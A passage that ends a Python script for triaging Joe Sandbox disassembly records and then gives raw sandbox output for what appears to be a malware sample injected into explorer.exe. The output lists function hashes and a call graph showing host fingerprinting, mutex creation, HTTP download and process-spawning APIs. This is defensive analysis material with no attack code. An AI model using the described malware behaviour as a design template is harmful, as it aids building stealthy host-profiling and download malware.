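    'review': calls Win32 APIs the analyst should read in the disassembly."""
    evidence = " ".join([rec.fields.get("API ID", ""), rec.fields.get("String ID", "")]
                        + rec.strings + [name for name, _, _ in rec.apis])
    if not evidence.strip():
        return "empty"
    if any(marker in evidence for marker in RUNTIME_MARKERS):
        return "runtime"
    return "review"


def triage(text):
    """Group the Opcode IDs of all records in `text` by verdict."""
    out = {"empty": [], "runtime": [], "review": []}
    for rec in parse_records(text):
        out[classify(rec)].append(rec.fields["Opcode ID"])
    return out


if __name__ == "__main__":
    for verdict, ids in triage(SAMPLE).items():
        print(verdict, len(ids), "function(s):", ", ".join(i[:12] for i in ids))
```

Run directly, the CAtlBaseModule record and the FlsGetValue/FlsSetValue record are filed under runtime and only the ErrorLast$Thread$CreateCurrent record is left for manual review. Feeding the parser a whole report gives a short list of Opcode IDs to open, instead of hundreds of records that are mostly CRT.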
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConditionMask$InfoVerifyVersion
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2793162063-0
                                                                                                                                                            • Opcode ID: 291ec1e7ae4a31a4ec110783320109d88dec717fbf20de4c32bb65debcfab247
                                                                                                                                                            • Instruction ID: 829d03ffbff77bbca154661313b9d0eb454c077c2207eabb3bfd33caf306102b
                                                                                                                                                            • Opcode Fuzzy Hash: 291ec1e7ae4a31a4ec110783320109d88dec717fbf20de4c32bb65debcfab247
                                                                                                                                                            • Instruction Fuzzy Hash: C5116131605B4486E776CF61F4993CA63A0F78CB08F40A028DA8D87B55EF7CC2098B00
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                            • Opcode ID: 01b0716ae32aa2de9c7ee0f5f817d458d00bda1606e98d4af1f1031553b1f871
                                                                                                                                                            • Instruction ID: 97576ab1064a69c91ed25d2ea4c15b169313daa3b111c4d023c45fbb1d204dd6
                                                                                                                                                            • Opcode Fuzzy Hash: 01b0716ae32aa2de9c7ee0f5f817d458d00bda1606e98d4af1f1031553b1f871
                                                                                                                                                            • Instruction Fuzzy Hash: 4D113332710F0489EB41DF60E8583E833A4F71DB68F441E25EA6D47BA4DF78C2588340
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                            • String ID: vector too long
                                                                                                                                                            • API String ID: 3668304517-2873823879
                                                                                                                                                            • Opcode ID: 4bb3616d7ea08d404592599af73fc3ed7cee367de65b429240fbc6d2583e8d6d
                                                                                                                                                            • Instruction ID: 21201f496ad6a7353e8fa5487a27329982cc9aebad2248fd340af911cef24260
                                                                                                                                                            • Opcode Fuzzy Hash: 4bb3616d7ea08d404592599af73fc3ed7cee367de65b429240fbc6d2583e8d6d
                                                                                                                                                            • Instruction Fuzzy Hash: 73B104326056CC45EEE7CA11D5143E97AA0A34E7E4F88DA11FAA9277D5DF7CC7898300
                                                                                                                                                            APIs
                                                                                                                                                            • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,000000018001D2F1,?,?,?,?,0000000180001063), ref: 00000001800D7BF8
                                                                                                                                                            • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000000018001D2F1,?,?,?,?,0000000180001063), ref: 00000001800D7C39
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                            • String ID: csm
                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                            • Opcode ID: 8575af2157c29f55c7baebbd7653556403f1897381ddad26d7c95b73a62a9a2e
                                                                                                                                                            • Instruction ID: fcce759da6952b3a2c3e9be7184885aaee10aadabcae59dccbb82db99caeb89f
                                                                                                                                                            • Opcode Fuzzy Hash: 8575af2157c29f55c7baebbd7653556403f1897381ddad26d7c95b73a62a9a2e
                                                                                                                                                            • Instruction Fuzzy Hash: 99115B36614B8482EBA28B15E44038D77E4F78CB94F588225EE8D07B65EF3CC655CB00

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:11.5%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                            Signature Coverage:0.6%
                                                                                                                                                            Total number of Nodes:868
                                                                                                                                                            Total number of Limit Nodes:10
                                                                                                                                                            execution_graph 4559 2beb86c 4560 2beb8c6 4559->4560 4561 2beb880 4559->4561 4562 2beb89e VirtualFree 4561->4562 4563 2be82b4 NtFreeVirtualMemory 4562->4563 4563->4560 3639 2be545d 3640 2be53a4 3639->3640 3641 2be5265 3639->3641 3642 2be5479 3640->3642 3644 2be82b4 NtFreeVirtualMemory 3640->3644 3643 2be5315 3641->3643 3646 2be5292 3641->3646 3645 2be532e HttpOpenRequestA 3643->3645 3644->3642 3649 2be539c 3645->3649 3648 2be52c7 HttpOpenRequestA 3646->3648 3648->3649 3649->3640 3650 2be53d6 3649->3650 3651 2be53b3 InternetSetOptionA 3649->3651 3652 2be5424 HttpSendRequestA 3650->3652 3655 2be53e0 3650->3655 3651->3650 3653 2be5443 3652->3653 3653->3640 3657 2be82b4 3653->3657 3656 2be53fb HttpSendRequestA 3655->3656 3656->3653 3658 2be82ce NtFreeVirtualMemory 3657->3658 3659 2be82ef 3657->3659 3658->3659 3659->3640 4361 2be922b 4362 2be904b InternetOpenW 4361->4362 4363 2be9086 4361->4363 4362->4363 4366 2be908b 4362->4366 4364 2be923d InternetCloseHandle 4363->4364 4365 2be9248 4363->4365 4364->4365 4367 2be925b 4365->4367 4368 2be9250 InternetCloseHandle 4365->4368 4369 2be55dc 3 API calls 4366->4369 4368->4367 4370 2be90ca 4369->4370 4370->4363 4371 2be90f4 4370->4371 4372 2bec860 8 API calls 4370->4372 4373 2be9106 4371->4373 4374 2be82b4 NtFreeVirtualMemory 4371->4374 4372->4371 4375 2be9118 InternetOpenUrlW 4373->4375 4376 2be82b4 NtFreeVirtualMemory 4373->4376 4374->4373 4375->4363 4378 2be9154 4375->4378 4376->4375 4377 2be915f InternetReadFile 4377->4378 4378->4363 4378->4377 4379 2beb648 3 API calls 4378->4379 4380 2beb388 NtAllocateVirtualMemory 4378->4380 4379->4378 4380->4378 4564 2be696b 4571 2be5b7a new[] 4564->4571 4565 2be69a2 GetExitCodeThread 4565->4571 4566 2be69de GetExitCodeThread 4566->4571 4567 2be5ba7 4568 2bec704 NtDelayExecution 4568->4571 4569 2beb388 NtAllocateVirtualMemory 
4569->4571 4570 2be5484 3 API calls 4570->4571 4571->4565 4571->4566 4571->4567 4571->4568 4571->4569 4571->4570 4572 2be6404 wsprintfA 4571->4572 4573 2be6025 wsprintfA 4571->4573 4574 2be5f36 wsprintfA 4571->4574 4575 2bebfc0 NtAllocateVirtualMemory 4571->4575 4576 2be8424 11 API calls 4571->4576 4577 2beb770 NtAllocateVirtualMemory 4571->4577 4578 2beb388 NtAllocateVirtualMemory 4571->4578 4579 2beb388 NtAllocateVirtualMemory 4571->4579 4581 2beb388 NtAllocateVirtualMemory 4571->4581 4587 2be6fc0 NtAllocateVirtualMemory 4571->4587 4588 2bebe64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4571->4588 4589 2be82b4 NtFreeVirtualMemory 4571->4589 4590 2be4e28 14 API calls 4571->4590 4591 2be8bdc GetCursorPos GetTickCount RtlRandom 4571->4591 4592 2be6cfc NtAllocateVirtualMemory 4571->4592 4593 2be5734 73 API calls 4571->4593 4572->4571 4573->4571 4574->4571 4575->4571 4576->4571 4577->4571 4580 2be6187 WideCharToMultiByte 4578->4580 4582 2be6243 WideCharToMultiByte 4579->4582 4583 2bebe64 3 API calls 4580->4583 4584 2be62ff WideCharToMultiByte 4581->4584 4585 2bebe64 3 API calls 4582->4585 4583->4571 4586 2bebe64 3 API calls 4584->4586 4585->4571 4586->4571 4587->4571 4588->4571 4589->4571 4590->4571 4591->4571 4592->4571 4593->4571 3660 2be8a58 3661 2be8a72 3660->3661 3662 2be8a79 3660->3662 3662->3661 3663 2be8b63 GetProcAddress GetProcAddressForCaller 3662->3663 3663->3661 4326 2be44b8 4329 2be43c4 4326->4329 4330 2be41b4 129 API calls 4329->4330 4331 2be43cd 4330->4331 4332 2be43eb 4331->4332 4334 2bec704 NtDelayExecution 4331->4334 4334->4331 4381 2be7528 4382 2be7548 4381->4382 4383 2be754f 4381->4383 4383->4382 4384 2be6fc0 NtAllocateVirtualMemory 4383->4384 4385 2be76a7 4384->4385 4387 2bec734 4385->4387 4388 2bec74f 4387->4388 4390 2bec74a 4387->4390 4389 2beb388 NtAllocateVirtualMemory 4388->4389 4389->4390 4390->4382 3664 2be43c4 3669 2be41b4 3664->3669 3666 2be43cd 3667 2be43eb 3666->3667 3690 2bec704 NtDelayExecution 3666->3690 3670 2be41d4 
3669->3670 3691 2be6cb4 3670->3691 3672 2be41dd 3672->3666 3673 2be41d9 3673->3672 3674 2be41fa GetCurrentProcess IsWow64Process 3673->3674 3674->3672 3675 2be4227 3674->3675 3703 2be7274 GetAdaptersInfo 3675->3703 3677 2be422c 3677->3672 3678 2be4266 CreateMutexW 3677->3678 3678->3672 3679 2be4286 GetLastError 3678->3679 3679->3672 3680 2be42ac GetModuleHandleW 3679->3680 3710 2be4c2c GetModuleHandleW GetCurrentProcessId 3680->3710 3687 2be42ec CreateThread 3688 2be4317 3687->3688 4318 2be43f4 3687->4318 3733 2be6c6c CreateThread 3688->3733 3690->3666 3692 2be6cbd 3691->3692 3702 2be6cf3 3692->3702 3735 2beabe8 3692->3735 3702->3673 3704 2be72ad 3703->3704 3705 2be72d1 3703->3705 3761 2beb388 NtAllocateVirtualMemory 3704->3761 3707 2be82b4 NtFreeVirtualMemory 3705->3707 3709 2be72df 3705->3709 3707->3709 3708 2be72b8 GetAdaptersInfo 3708->3705 3709->3677 3763 2be82f4 3710->3763 3714 2be4c7f 3716 2be4d17 GetCurrentProcessId 3714->3716 3717 2be4d33 3714->3717 3718 2be4cf3 3714->3718 3716->3714 3719 2be42c1 3717->3719 3720 2be4d44 3717->3720 3718->3714 3773 2be891c 3718->3773 3719->3672 3722 2be7314 3719->3722 3779 2be4d58 3720->3779 3723 2beb388 NtAllocateVirtualMemory 3722->3723 3724 2be732c 3723->3724 3831 2bebfc0 3724->3831 3726 2be737f 3727 2bebfc0 NtAllocateVirtualMemory 3726->3727 3728 2be42d1 3727->3728 3728->3672 3729 2be71f0 3728->3729 3730 2be7208 3729->3730 3731 2bebfc0 NtAllocateVirtualMemory 3730->3731 3732 2be42e1 3731->3732 3732->3672 3732->3687 3734 2be6ca3 3733->3734 3834 2be5a64 3733->3834 3734->3672 3736 2beb1c8 3735->3736 3737 2be6ccf 3736->3737 3757 2be8a58 3736->3757 3737->3702 3739 2be99d0 3737->3739 3742 2bea82d 3739->3742 3740 2be6cd8 3740->3702 3743 2beaa0c 3740->3743 3741 2be8a58 2 API calls 3741->3742 3742->3740 3742->3741 3746 2beab3d 3743->3746 3744 2bea8e0 7 API calls 3744->3746 3745 2be6ce1 3745->3702 3747 2be9350 3745->3747 3746->3744 3746->3745 3750 2be9892 3747->3750 3748 2be6cea 3748->3702 3753 2beb2a4 3748->3753 3749 2be9972 3752 
2be8a58 2 API calls 3749->3752 3750->3748 3750->3749 3751 2be8a58 GetProcAddress GetProcAddressForCaller 3750->3751 3751->3750 3752->3748 3754 2beb315 3753->3754 3755 2be8a58 2 API calls 3754->3755 3756 2beb372 3754->3756 3755->3754 3756->3702 3758 2be8a72 3757->3758 3759 2be8a79 3757->3759 3758->3736 3759->3758 3760 2be8b63 GetProcAddress GetProcAddressForCaller 3759->3760 3760->3758 3762 2beb3c8 3761->3762 3762->3708 3782 2be8c30 3763->3782 3768 2be8d3c 3829 2beb470 3768->3829 3771 2be8d6e wsprintfA 3772 2be8d87 3771->3772 3772->3714 3774 2be893a 3773->3774 3775 2be894c RtlGetVersion 3774->3775 3776 2be8957 3774->3776 3775->3776 3777 2be8961 GetVersionExW 3776->3777 3778 2be896c 3776->3778 3777->3778 3778->3718 3780 2be4d66 CloseHandle 3779->3780 3781 2be4d73 3779->3781 3780->3781 3781->3719 3783 2be8c4e 3782->3783 3784 2be8c60 FindFirstVolumeW 3783->3784 3785 2be82fd 3784->3785 3786 2be8c81 GetVolumeInformationW FindVolumeClose 3784->3786 3787 2be8e18 3785->3787 3786->3785 3788 2be8e41 3787->3788 3797 2be8fc8 3788->3797 3791 2be4c73 3791->3768 3792 2beb388 NtAllocateVirtualMemory 3793 2be8e63 3792->3793 3794 2be8e91 3793->3794 3802 2bebe64 3793->3802 3796 2be82b4 NtFreeVirtualMemory 3794->3796 3796->3791 3798 2beb388 NtAllocateVirtualMemory 3797->3798 3799 2be8fe4 3798->3799 3800 2be8e4b 3799->3800 3806 2be8ec8 3799->3806 3800->3791 3800->3792 3803 2bebe7c 3802->3803 3809 2bebeac 3803->3809 3805 2bebea5 3805->3794 3807 2be8eea 3806->3807 3808 2be8f05 wsprintfA 3807->3808 3808->3800 3812 2beb704 3809->3812 3811 2bebedb 3811->3805 3813 2beb718 3812->3813 3814 2beb733 3812->3814 3815 2be82b4 NtFreeVirtualMemory 3813->3815 3818 2beb648 3814->3818 3817 2beb725 3815->3817 3817->3811 3819 2beb66f 3818->3819 3820 2beb679 3818->3820 3826 2beb430 3819->3826 3823 2beb388 NtAllocateVirtualMemory 3820->3823 3825 2beb698 3820->3825 3822 2beb6a5 3822->3817 3823->3825 3824 2be82b4 NtFreeVirtualMemory 3824->3822 3825->3822 3825->3824 3827 2beb445 VirtualQuery 3826->3827 3828 
2beb441 3826->3828 3827->3828 3828->3820 3830 2be8d5a GetUserNameA 3829->3830 3830->3771 3830->3772 3832 2beb388 NtAllocateVirtualMemory 3831->3832 3833 2bebfdc 3832->3833 3833->3726 3836 2be5aed 3834->3836 3862 2be5b5a new[] 3836->3862 3940 2bec704 NtDelayExecution 3836->3940 3837 2be5ba7 3839 2bec704 NtDelayExecution 3874 2be5c2f new[] 3839->3874 3841 2be82b4 NtFreeVirtualMemory 3841->3862 3842 2be6404 wsprintfA 3842->3874 3843 2be6025 wsprintfA 3843->3862 3844 2be5f36 wsprintfA 3844->3862 3845 2bebfc0 NtAllocateVirtualMemory 3845->3862 3847 2be82b4 NtFreeVirtualMemory 3847->3862 3848 2bebe64 3 API calls 3848->3862 3850 2beb388 NtAllocateVirtualMemory 3850->3862 3851 2beb388 NtAllocateVirtualMemory 3853 2be6187 WideCharToMultiByte 3851->3853 3852 2beb388 NtAllocateVirtualMemory 3855 2be6243 WideCharToMultiByte 3852->3855 3856 2bebe64 3 API calls 3853->3856 3854 2beb388 NtAllocateVirtualMemory 3857 2be62ff WideCharToMultiByte 3854->3857 3858 2bebe64 3 API calls 3855->3858 3856->3874 3859 2bebe64 3 API calls 3857->3859 3858->3874 3859->3874 3861 2be82b4 NtFreeVirtualMemory 3861->3862 3862->3837 3862->3845 3862->3848 3862->3850 3862->3861 3862->3874 3875 2be5484 3862->3875 3886 2be8424 3862->3886 3912 2beb770 3862->3912 3920 2be6fc0 3862->3920 3924 2be4e28 3862->3924 3941 2be8bdc 3862->3941 3864 2be8bdc 3 API calls 3864->3874 3865 2be69a2 GetExitCodeThread 3865->3874 3867 2be69de GetExitCodeThread 3867->3874 3868 2beb388 NtAllocateVirtualMemory 3868->3874 3870 2bebe64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 3870->3874 3871 2be6fc0 NtAllocateVirtualMemory 3871->3874 3872 2bebfc0 NtAllocateVirtualMemory 3872->3874 3873 2be82b4 NtFreeVirtualMemory 3873->3874 3874->3839 3874->3841 3874->3842 3874->3843 3874->3844 3874->3847 3874->3851 3874->3852 3874->3854 3874->3862 3874->3864 3874->3865 3874->3867 3874->3868 3874->3870 3874->3871 3874->3872 3874->3873 3947 2be6cfc 3874->3947 3951 2be5734 3874->3951 3876 2be54bc 3875->3876 3877 2beb388 
[Call-graph edge list, continued from the preceding section (rendered graph residue, node ids 3876-4613 over function addresses 02BE2164-02BECF4C; edge data not reproduced). APIs referenced on the graph nodes: NtAllocateVirtualMemory, NtFreeVirtualMemory, NtDelayExecution, NtCreateFile, NtWriteFile, NtClose, RtlInitUnicodeString, RtlRandom, VirtualAlloc, VirtualFree, VirtualQuery, GetAdaptersInfo, GetComputerNameExA, GetCursorPos, GetTickCount, wsprintfA, wsprintfW, MultiByteToWideChar, InternetOpenW, InternetConnectA, InternetConnectW, InternetCrackUrlA, InternetCrackUrlW, InternetOpenUrlW, HttpOpenRequestA, HttpOpenRequestW, HttpSendRequestA, HttpSendRequestW, InternetSetOptionA, InternetSetOptionW, InternetQueryOptionW, InternetReadFile, InternetCloseHandle, CreateToolhelp32Snapshot, Process32First, Process32Next, FindFirstFileA, FindNextFileA, FindClose, SHGetFolderPathA, SHGetFolderPathW, CreateProcessW, CreateThread, SetEvent, ReleaseMutex, CloseHandle, PeekNamedPipe, ReadFile, GetExitCodeProcess, TerminateProcess, CreateFileMappingA, MapViewOfFile, UnmapViewOfFile, MessageBoxA.]

Control-flow Graph
• Function 02BE8424-02BE87F1: blocks call GetAdaptersInfo, GetComputerNameExA and wsprintfA, and the subroutines 02BEB388, 02BEB4CC and 02BE82B4 (rendered graph with executed/not-executed colouring not reproduced)
APIs
  • Part of subcall function 02BEB388: NtAllocateVirtualMemory.NTDLL ref: 02BEB3BE
• GetAdaptersInfo.IPHLPAPI ref: 02BE8470
• GetAdaptersInfo.IPHLPAPI ref: 02BE84A7
• wsprintfA.USER32 ref: 02BE84F0
• wsprintfA.USER32 ref: 02BE85DB
• wsprintfA.USER32 ref: 02BE863F
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
Similarity
• API ID: wsprintf$AdaptersInfo$AllocateMemoryVirtual
• String ID: o
• API String ID: 2074107575-252678980
• Opcode ID: 297d1a7e7ca8095e50a572676fb4cd9321a35f6664537050dc1b6cbbb83bb27f
• Instruction ID: 07237836dc465af0d40635e9aa9b6de13f9db9fe273b22db50aad31b676406b2
• Opcode Fuzzy Hash: 297d1a7e7ca8095e50a572676fb4cd9321a35f6664537050dc1b6cbbb83bb27f
• Instruction Fuzzy Hash: 12A1D776209B848ADF60DB14F49436AB7A1F788788F440569EA8F83B69EF3CC544CF40

Control-flow Graph
• Function 02BE7274-02BE7313: blocks call GetAdaptersInfo twice and the subroutines 02BEB388 and 02BE82B4 (rendered graph with executed/not-executed colouring not reproduced)
APIs
• GetAdaptersInfo.IPHLPAPI ref: 02BE729C
  • Part of subcall function 02BEB388: NtAllocateVirtualMemory.NTDLL ref: 02BEB3BE
• GetAdaptersInfo.IPHLPAPI ref: 02BE72C7
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
Similarity
• API ID: AdaptersInfo$AllocateMemoryVirtual
• String ID: o
• API String ID: 2718687846-252678980
• Opcode ID: 7f42663b622c32a3db8ec0ccf10743740cf63e3247e40a922d1c01b602dc0a8d
• Instruction ID: 3dbdb59a0c15dec04f7a4b254029ae379215af9c35f466dbf3b72612d61e8e0a
• Opcode Fuzzy Hash: 7f42663b622c32a3db8ec0ccf10743740cf63e3247e40a922d1c01b602dc0a8d
• Instruction Fuzzy Hash: 3B01F072608B0486DB309B15E48831EB7A0F3C8B98F444265EACE47B68DF7CC685DF04

Control-flow Graph
• Function 02BEA8E0-02BEAA0B: blocks call FindFirstFileW, FindNextFileW and LoadLibraryW, and the subroutines 02BE8CF0, 02BEB4CC, 02BEBF78, 02BEB470, 02BEC144, 02BE7430 and 02BE82B4 (rendered graph with executed/not-executed colouring not reproduced)
Memory Dump Source
• Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
Similarity
• API ID: DirectorySystem
• String ID:
• API String ID: 2188284642-0
• Opcode ID: ba65162137a8887c46524e037aee2d8e48247b8fd7d5144eb10fde51ea88d61c
• Instruction ID: 41cd26ee5ddc94755a1b64aff1b82d6ac2243428207661208b9dc2a7da8011c2
• Opcode Fuzzy Hash: ba65162137a8887c46524e037aee2d8e48247b8fd7d5144eb10fde51ea88d61c
• Instruction Fuzzy Hash: 74311E26118A81D6DF60DB24E88436AB375F7D4364F510766E6EF82AA8DF3CC544CB00

Control-flow Graph
• Executed
• Not Executed
control_flow_graph 221 2beb388-2beb3c6 NtAllocateVirtualMemory 222 2beb3c8-2beb3d2 call 2beb470 221->222 223 2beb3d7-2beb3e0 221->223 222->223
APIs
• NtAllocateVirtualMemory.NTDLL ref: 02BEB3BE
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
Similarity
• API ID: AllocateMemoryVirtual
• String ID: @
• API String ID: 2167126740-2766056989
• Opcode ID: 2e93f9f6b96c1bd6ea69c113b3f2c8e4b302791aa10c0df241b540a453c9b905
• Instruction ID: e37ef1ee9727360c26cd02d56bfae5fe7feedc9bf25c1d34db05d18b9feb54b4
• Opcode Fuzzy Hash: 2e93f9f6b96c1bd6ea69c113b3f2c8e4b302791aa10c0df241b540a453c9b905
• Instruction Fuzzy Hash: A7E0ACA222468482D6509F65E45470AB760F7847B8F405305BAA906BD8CB7CC114CF00

Control-flow Graph
control_flow_graph 243 2be5078-2be50ba 244 2be50bc-2be50dc InternetReadFile 243->244 245 2be50de-2be50e3 244->245 246 2be514f 244->246 245->246 247 2be50e5-2be5102 call 2beb704 245->247 248 2be5154-2be515c 246->248 251 2be5108-2be514a call 2beb3e4 247->251 252 2be5104-2be5106 247->252 251->244 252->248
APIs
Memory Dump Source
• Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
Similarity
• API ID: FileInternetRead
• String ID:
• API String ID: 778332206-0
• Opcode ID: 29b86a3ab9ddbe11ce9b9fbde145847ecb2975815f7cf14476ac95fa9b6fe6b1
• Instruction ID: f6eb12cbc2af2a7fb984a4205d5f8d5a4f25340a83c479b820adbcb5fd94ecb4
• Opcode Fuzzy Hash: 29b86a3ab9ddbe11ce9b9fbde145847ecb2975815f7cf14476ac95fa9b6fe6b1
• Instruction Fuzzy Hash: 7F21C8323296859BDB70CA15E55479AB3E1F38CB88F804165EA8E83B58EB7DC644CF00

Control-flow Graph
control_flow_graph 296 2be82b4-2be82cc 297 2be82ce-2be82eb NtFreeVirtualMemory 296->297 298 2be82ef-2be82f3 296->298 297->298
APIs
Memory Dump Source
• Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
Similarity
• API ID: FreeMemoryVirtual
• String ID:
• API String ID: 3963845541-0
• Opcode ID: db712fdc7e1c69cc4b3c08b17230264df9142ca57683cf2c056e2540a21d56f0
• Instruction ID: 9284cde949d1fea6598e9ad4100885fcf05e522a0b35ec1fdf7fb3df10e35bf1
• Opcode Fuzzy Hash: db712fdc7e1c69cc4b3c08b17230264df9142ca57683cf2c056e2540a21d56f0
• Instruction Fuzzy Hash: 24E0EC72518A8182DB619B60E404389B760F7853B8F944315EAF912AF8CF7CC289CB04

Control-flow Graph
control_flow_graph 299 2bec704-2bec730 NtDelayExecution
APIs
Memory Dump Source
• Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
Similarity
• API ID: DelayExecution
• String ID:
• API String ID: 1249177460-0
• Opcode ID: 551b8892589dcd62e4628d181c76442dc689c90fb238e82810fb464567079569
• Instruction ID: c8667a19c2c965e1d30d0fbb7cf5caf44128044b0e3ae6efb0ec4c5af53b8674
• Opcode Fuzzy Hash: 551b8892589dcd62e4628d181c76442dc689c90fb238e82810fb464567079569
• Instruction Fuzzy Hash: AFD0C77260468087CB145B14E84520E7760F795344FD04529E68D45768DB3CD265CF04

Control-flow Graph
Memory Dump Source
• Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9e74177ae8edb192d765eaf2097ca1072eb58028511075e98d8bdaa32260b05f
• Instruction ID: 38031ce69e784e325fa301e7b0fe783bc4cade89e7a961ec88f2139575a1472e
• Opcode Fuzzy Hash: 9e74177ae8edb192d765eaf2097ca1072eb58028511075e98d8bdaa32260b05f
• Instruction Fuzzy Hash: 98315E31228A4182EF60ABB4F94836A7371FB84369F4057A5F9AB466E8DF78C405CB05

Control-flow Graph
